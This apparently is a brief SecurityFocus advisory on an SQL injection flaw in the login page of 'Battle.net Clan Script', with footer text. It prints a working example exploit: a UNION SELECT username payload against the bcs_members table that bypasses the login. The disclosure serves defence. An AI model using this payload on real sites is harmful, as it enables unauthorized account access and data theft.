Battle.net Clan Script Login.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example exploit is available:

Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything


 

Privacy Statement
Copyright 2010, SecurityFocus